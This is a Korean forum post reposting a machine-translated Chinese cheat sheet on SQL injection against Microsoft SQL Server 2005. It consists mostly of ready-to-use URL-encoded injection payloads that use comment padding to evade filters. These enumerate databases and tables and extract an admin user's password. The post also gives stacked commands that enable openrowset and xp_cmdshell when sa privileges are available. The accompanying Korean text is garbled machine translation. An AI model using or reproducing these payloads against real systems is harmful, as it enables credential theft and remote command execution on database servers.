MSSQL 2005 - SQL인젝션 > db

본문 바로가기

db

MSSQL 2005 - SQL인젝션

페이지 정보

작성자 서방님 댓글 0건 조회 18회 작성일 08-04-30 09:17

본문

mssql 2005 SQL인젝션 내용입니다.

 

자동 번역기 돌린 내용이라 매끄럽지 않네요..

 

스크립트 위주로 보심 될듯요..^^

순서대로 잘 정리되어 있군요...

흠......

 

mssql2005가 방법을 주입한다

정리는 아래와 같다
/**/빈칸의 작용과 같이, 어떤 때가 여과를 일부에 지날 수 있다

창고 어구가 폭발하고, 혁명적 부분의 숫자를 수정하여 차례차례 출고를 추측한다

QUOTE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
표 어구가 폭발하고, somedb 일부는 소에서 나열되어야 한 데이타베이스, 혁명적 숫자가 한 누가이다

QUOTE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
블록 어구가 폭발하여, 표 admin 속을 폭발하여 user= ' icerover ' 비밀번호단

/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
mssql2005 묵인이 xp cmdshell을 열지 않고, openrowset는 또한 사용할 수 없다
만약 sa 권한이면, 이렇게 개방을 올 수 있다

openrowset를 개통한다

EXEC/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
xp cmdshell을 개통한다

EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over

 

원문 : http://www.nspcn.org/forum/viewthread.php?tid=2535

댓글목록

등록된 댓글이 없습니다.

Total 447건 1 페이지
게시물 검색

회원로그인

접속자집계

오늘
139
어제
365
최대
592
전체
40,113

그누보드5
Copyright © seobangnim.com All rights reserved.
자바스크립트를 활성화 하세요![ 브라우저에서 자바스크립트를 활성화하는 방법 ]